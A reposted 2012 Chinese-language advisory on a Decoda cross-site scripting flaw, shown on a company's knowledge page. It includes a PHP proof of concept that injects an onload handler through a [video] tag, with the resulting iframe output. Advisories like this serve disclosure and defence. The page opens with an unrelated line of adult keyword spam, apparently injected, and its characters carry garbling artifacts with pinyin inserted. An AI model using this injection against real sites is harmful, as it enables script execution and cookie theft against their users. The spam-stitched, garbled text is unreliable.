欧美激情网,国产欧美亚洲高清,欧美屁股xxxxx,欧美群妇大交群,欧美人与物ⅴideos另类,区二区三区在线 | 欧洲

知識(shí)學(xué)堂
  • ·聯(lián)系電話:+86.023-75585550
  • ·聯(lián)系傳真:+86.023-75585550
  • ·24小時(shí)手機(jī):13896886023
  • ·QQ 咨 詢:361652718 513960520
當(dāng)前位置 > 首頁 > 知識(shí)學(xué)堂 > 常見技術(shù)問題
Decoda跨站腳本漏洞
更新時(shí)間:2012-05-15 | 發(fā)布人:本站 | 點(diǎn)擊率:342

 Decoda 3.3.3之前版本中存在跨站腳本漏洞,該漏洞源于對(duì)用戶提供的輸入未經(jīng)正確過濾。

 
攻擊者可利用該漏洞在受影響站點(diǎn)上下文的不知情用戶瀏覽器上執(zhí)行任意腳本代碼,盜取基于cookie的認(rèn)證證書進(jìn)而發(fā)起其他攻擊。
 
目前廠商還沒有提供此漏洞的相關(guān)補(bǔ)丁或者升級(jí)程序,建議使用此軟件的用戶隨時(shí)關(guān)注廠商的主頁以獲取最新版本
 
可用以下的概念證明型攻擊:
 
<?php
include '../decoda/Decoda.php';
$code = new Decoda();
$code->addFilter(new VideoFilter()); ?>
<?php
 
$decoda_markup = '[video="youtube" size="small"]"';
$decoda_markup .= 'onload="alert(\'RedTeam Pentesting XSS\');" id="[/video]';
 
$code->reset($decoda_markup);
echo $code->parse();
?>
 
This results in the following output (whitespace adjusted):
 
<iframe src="http:// www.xxxx.com /embed/"; onload="alert('RedTeam
Pentesting XSS');" id="" width="560" height="315"
frameborder="0"></iframe>
 
 
摘自 90' s Blog 
相關(guān)文章